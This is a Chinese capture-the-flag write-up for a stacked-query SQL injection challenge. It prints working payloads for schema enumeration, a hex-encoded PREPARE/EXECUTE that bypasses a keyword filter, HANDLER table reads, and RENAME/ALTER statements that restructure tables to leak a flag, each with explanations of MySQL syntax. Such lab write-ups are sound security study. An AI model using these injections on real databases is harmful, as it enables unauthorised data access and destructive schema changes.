url变为:http://b61f33a4-644b-402a-9da5-4bdf8043f954.node4.buuoj.cn/?inject=1
可知传入的参数名为 inject,参数为1。
输入:1' or '1'='1';# 可得到所有数据,但没有flag。
输入:1' union select 1,2;#
过滤了select、update、delete、drop、insert、where、点。
输入:1';show databases;#
得到数据库:ctftraining、information_schema、mysql、performance_schema、supersqli、test
输入:1';show tables;#
得到表:1919810931114514、words。
输入:1';show columns from `1919810931114514`;#
得到表1919810931114514的列为flag,可知flag在1919810931114514表中。
注:SQL语句中有两类特殊字符:关键字、保留字。
关键字:在Mysql中具有特殊含义,比如alter、static、cache。虽然具有特殊含义,但是还是可以作为Mysql中的标识符来使用的。例如你创建一个表名为static的表并没有什么问题,但不推荐这么做。
保留字:是Mysql自身保留的标识符,例如select、insert。这类字在Mysql中就比较强势了,一般情况下是不允许使用的,非要使用,则加反引号(键盘tab键上面,数字1左边的那个按键),`select` 即可作为表名了。
纯数字:纯数字作为表名和字段名也必须加反引号,如`1919810931114514`
(要尽量避免使用关键字、保留字、纯数字来作为表名和字段名)
输入:1';show columns from words;#
得到表words的列有:id、data,可知页面默认查询显示的为表words的内容,传入的inject参数为id值。
思路:将 select * from `1919810931114514` 进行16进制编码,绕过过滤。
输入:
1';SET @a=0x73656c656374202a2066726f6d20603139313938313039333131313435313460;PREPARE execsql FROM @a;EXECUTE execsql;#原理解释:
2.8.1.1:十六进制编码绕过 select 过滤
MYSQL可以识别十六进制并对其进行自动转换。
select * from `
1919810931114514`十六进制编码为:0x73656c656374202a2066726f6d20603139313938313039333131313435313460
2.8.1.2:SQL语法之“用户变量”
用户变量:用户自己定义的变量,我们可以给用户变量分配值,并且可用在任何可以正常使用标量表达式的地方。用户变量可以作用于当前整个连接,但是当当前连接断开后,其所定义的用户变量都会消失。
定义变量:@变量名
变量赋值:SET @userName = (SELECT name FROM user WHERE id = 2);
SET @userName := (SELECT name FROM user WHERE id = 2);
SELECT @userName := (SELECT name FROM user WHERE id = 2);
对于SET,可以使用=或:=来赋值,对于SELECT只能使用:=来赋值。
因为SELECT语句中,等号会被看做是比较操作符。
2.8.1.3:SQL语法之“预处理”
SQL语句分两种:即时 SQL、预处理SQL
即时SQL:一次编译,单次运行
一条 SQL 在数据库接收到后执行的流程为:词法和语义解析 -> 优化 SQL 语句,制定执行计划 -> 执行并返回结果。
预处理 SQL:一次编译、多次运行。不会直接执行 SQL 语句,而是先将 SQL 语句编译,生成执行计划,然后通过 Execute 命令携带 SQL 参数执行 SQL 语句。
绝大多数情况下,某一条 SQL 语句可能会被反复调用执行,或者每次执行的时候只有个别的值不同。如果每次都需要经过上面的词法语义解析、语句优化、制定执行计划等,则效率就明显不行了。所谓预编译语句就是将此类 SQL 语句中的值用占位符?替代,可以视为将 SQL 语句模板化或者说参数化,一般称这类语句叫Prepared Statements。 此外预编译语句能防止 SQL 注入。
定义:PREPARE statement_name FROM preparable_SQL_statement;
执行:EXECUTE statement_name USING @var_name1 ,@var_name2 ...;
删除:DEALLOCATE/DROP PREPARE statement_name;
注:DEALLOCATE、DROP都可以删除,每一次执行完EXECUTE时,养成好习惯,进行删除,释放执行中使用的所有数据库资源。
思路:MySQL 除了可以使用 select 查询表中的数据,也可使用 handler 语句查询数据。
注入:1'; handler `1919810931114514` open; handler `1919810931114514` read first;#
原理解释:
HANDLER语句使我们能够一行一行的浏览一个表中的数据,handler 语句并不具备 select 语句的所有功能,它是 MySQL 专用的语句,并没有包含到SQL标准中。
语法:
打开句柄:handler handler_table open;
查看数据:handler handler_table read first/next/prev/last;
关闭句柄:handler handler_table close;
具体参考:https://blog.csdn.net/qq_43427482/article/details/109898934
思路:因为页面默认查询显示的为表words的内容,可通过 rename 先把 words 表改名为其他的表名,再把 1919810931114514 表的名字改为 words ,给新 words 表添加新的列名 id ,id默认值为1,将 flag 改名为 data 。
输入:1'; rename table words to word1; rename table `1919810931114514` to words; alter table words add id int(10) default 1; alter table words change flag data varchar(100); #
这样再输入1,即可把flag值显示出来。
注 :不建议使用这种方法,如果在改表words名成功,但后面的改1919810931114514表名、加id列出错的话,将会很麻烦。更改数据库可能导致无法解题。